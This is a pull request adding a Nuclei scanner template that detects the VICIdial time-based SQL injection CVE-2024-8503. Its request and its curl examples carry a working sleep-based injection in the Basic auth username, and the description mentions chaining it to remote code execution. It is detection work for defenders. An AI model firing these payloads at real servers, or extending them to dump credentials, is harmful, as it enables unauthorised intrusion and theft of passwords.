### PR TITLE
add CVE-2024-8503

### DIFF
--- a/http/cves/2024/CVE-2024-8503.yaml
+++ b/http/cves/2024/CVE-2024-8503.yaml
@@ -3,19 +3,19 @@ id: CVE-2024-8503
 info:
   name: VICIdial - Sql Injection
   author: s4e-io
-  severity: high
+  severity: critical
   description: |
     An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial to enumerate database records. By default, VICIdial stores plaintext credentials within the database.
   reference:
     - https://en.0day.today/exploit/39746
     - https://github.com/Chocapikk/CVE-2024-8504
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 8.8
-    cve-id: CVE-2024-8504
-    cwe-id: CWE-78
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-8503
+    cwe-id: CWE-89
     epss-score: 0.00043
-    epss-percentile: 0.10241
+    epss-percentile: 0.09586
   metadata:
     verified: true
     max-request: 1

--- a/http/cves/2024/CVE-2024-8503.yaml
+++ b/http/cves/2024/CVE-2024-8503.yaml
@@ -1,0 +1,57 @@
+id: CVE-2024-8503
+
+info:
+  name: VICIdial - Sql Injection
+  author: s4e-io
+  severity: high
+  description: |
+    An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial to enumerate database records. By default, VICIdial stores plaintext credentials within the database.
+  reference:
+    - https://en.0day.today/exploit/39746
+    - https://github.com/Chocapikk/CVE-2024-8504
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2024-8504
+    cwe-id: CWE-78
+    epss-score: 0.00043
+    epss-percentile: 0.10241
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: vicidial
+    product: vicidial
+    fofa-query: icon_hash="1375401192"
+  tags: cve,cve2024,cve-2024-8504,vicidial,sqli
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET /vicidial/welcome.php HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_all(body,"Agent Login","Timeclock","Administration")'
+          - 'contains(content_type,"text/html")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        @timeout 45s
+        GET /VERM/VERM_AJAX_functions.php?function=log_custom_report HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Basic JywnJyxzbGVlcCg2KSk7IzpiYXI=
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+          - 'contains(content_type,"text/html")'
+          - 'status_code == 200'
+        condition: and

--- a/http/cves/2024/CVE-2024-8503.yaml
+++ b/http/cves/2024/CVE-2024-8503.yaml
@@ -1,7 +1,7 @@
 id: CVE-2024-8503
 
 info:
-  name: VICIdial - Sql Injection
+  name: VICIdial - SQL Injection
   author: s4e-io
   severity: critical
   description: |
@@ -9,6 +9,7 @@ info:
   reference:
     - https://en.0day.today/exploit/39746
     - https://github.com/Chocapikk/CVE-2024-8504
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-8503
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -18,7 +19,7 @@ info:
     epss-percentile: 0.09586
   metadata:
     verified: true
-    max-request: 1
+    max-request: 2
     vendor: vicidial
     product: vicidial
     fofa-query: icon_hash="1375401192"

--- a/http/cves/2024/CVE-2024-8503.yaml
+++ b/http/cves/2024/CVE-2024-8503.yaml
@@ -22,7 +22,7 @@ info:
     vendor: vicidial
     product: vicidial
     fofa-query: icon_hash="1375401192"
-  tags: cve,cve2024,cve-2024-8504,vicidial,sqli
+  tags: cve,cve2024,vicidial,sqli
 
 flow: http(1) && http(2)
 
@@ -43,7 +43,7 @@ http:
 
   - raw:
       - |
-        @timeout 45s
+        @timeout 20s
         GET /VERM/VERM_AJAX_functions.php?function=log_custom_report HTTP/1.1
         Host: {{Hostname}}
         Authorization: Basic JywnJyxzbGVlcCg2KSk7IzpiYXI=


### PR DESCRIPTION
This vulnerability can lead to username and plaintext password exposure. When combined with CVE-2024-8504, it causes a remote code execution vulnerability via sql injection.
I tested the template on a time basis when writing it instead of looking for username and password.

```
$ time curl -u "foo:bar" \
  http://redacted/VERM/VERM_AJAX_functions.php?function=log_custom_report
 
     real    0m0.019s   <--- (normal response time)
     user    0m0.004s
     sys    0m0.008s
 
     $ time curl -u "','',sleep(5));#:bar" \
  http://redacted/VERM/VERM_AJAX_functions.php?function=log_custom_report
 
     real    0m5.023s   <--- (5-second delay in response time)
     user    0m0.003s
     sys    0m0.008s
```
CVE-2024-8503 CVE-2024-8504

pocs:
https://en.0day.today/exploit/39746
https://github.com/Chocapikk/CVE-2024-8504


<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)